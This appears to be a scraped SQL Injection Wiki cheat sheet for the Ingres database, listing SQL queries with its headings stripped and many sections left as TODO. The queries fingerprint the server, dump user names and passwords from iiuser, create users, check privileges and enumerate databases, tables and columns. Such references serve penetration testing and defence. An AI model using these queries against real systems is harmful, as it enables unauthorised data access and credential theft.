The SQL Injection Wiki project aims to provide all bells and whistles about SQL Injection. It is a good reference for both seasoned web security professionals and those who are just starting. This project website is frequently updated and currently includes detailed documentation about SQL Injection attack variants for the below list of databases:

The SQL Injection Wiki is sponsored by Netsparker, an automated false positive free web vulnerability scanner. Download a free trial.

Ingres SQL Injection Cheat Sheet

 

 

Back to top

  • SELECT dbmsinfo('_version');

Back to top

  • SELECT 123; -- comment
  • SELECT 123; /* comment */

Back to top

  • SELECT dbmsinfo('session_user');
  • SELECT dbmsinfo('system_user');

Back to top

First connect to iidbdb, then:

  • SELECT name, password FROM iiuser;
  • SELECT own FROM iidatabase;

Back to top

  • CREATE USER testuser WITH password = 'testuser'; -- priv

Back to top

First connect to iidbdb, then:

  • SELECT name, password FROM iiuser;

Back to top

  • SELECT dbmsinfo('db_admin');
  • SELECT dbmsinfo('create_table');
  • SELECT dbmsinfo('create_procedure');
  • SELECT dbmsinfo('security_priv');
  • SELECT dbmsinfo('SELECT_syscat');
  • SELECT dbmsinfo('db_privileges');
  • SELECT dbmsinfo('current_priv_mask');

Back to top

TODO

Back to top

  • SELECT dbmsinfo('database');

Back to top

  • SELECT name FROM iidatabase; -- connect to iidbdb

Back to top

  • SELECT column_name, column_datatype, table_name, table_owner FROM iicolumns;

Back to top

  • SELECT table_name, table_owner FROM iitables;
  • SELECT relid, relowner, relloc FROM iirelation;
  • SELECT relid, relowner, relloc FROM iirelation WHERE relowner != '$ingres';

Back to top

  • SELECT table_name, table_owner FROM iicolumns WHERE column_name = 'value';

Back to top

TODO

Back to top

  • SELECT substr('abc', 2, 1); -- returns 'b'

Back to top

The function “bit_and” exists, but seems hard to use.

Here’s an example of ANDing 3 and 5 together.  The result is a “byte” type
with value ?01:

  • SELECT SUBSTR(BIT_AND(CAST(3 as byte), CAST(5 as byte)),1,1);

Back to top

TODO

Back to top

TODO

Back to top

  • SELECT CAST(123 as varchar);
  • SELECT CAST('123' as integer);

Back to top

  • SELECT 'abc' || 'def';

Back to top

TODO

Back to top

TODO

Back to top

TODO

Back to top

TODO

Back to top

TODO

Back to top

TODO

Back to top

TODO

Back to top

  • SELECT dbmsinfo('ima_server');

Back to top

  • SELECT dbdev, ckpdev, jnldev, sortdev FROM iidatabase WHERE name = 'value' -- primary location of db
  • SELECT lname FROM iiextend WHERE dname = 'value' -- extended location of db
  • SELECT are FROM iilocations where lname = 'value' -- all area (ie directory) linked with a location

Back to top

  • SELECT name FROM iidatabase WHERE own = '$ingres' -- connect to iidbdb

Back to top

The Ingres database can be downloaded for free from http://esd.ingres.com.

Back to top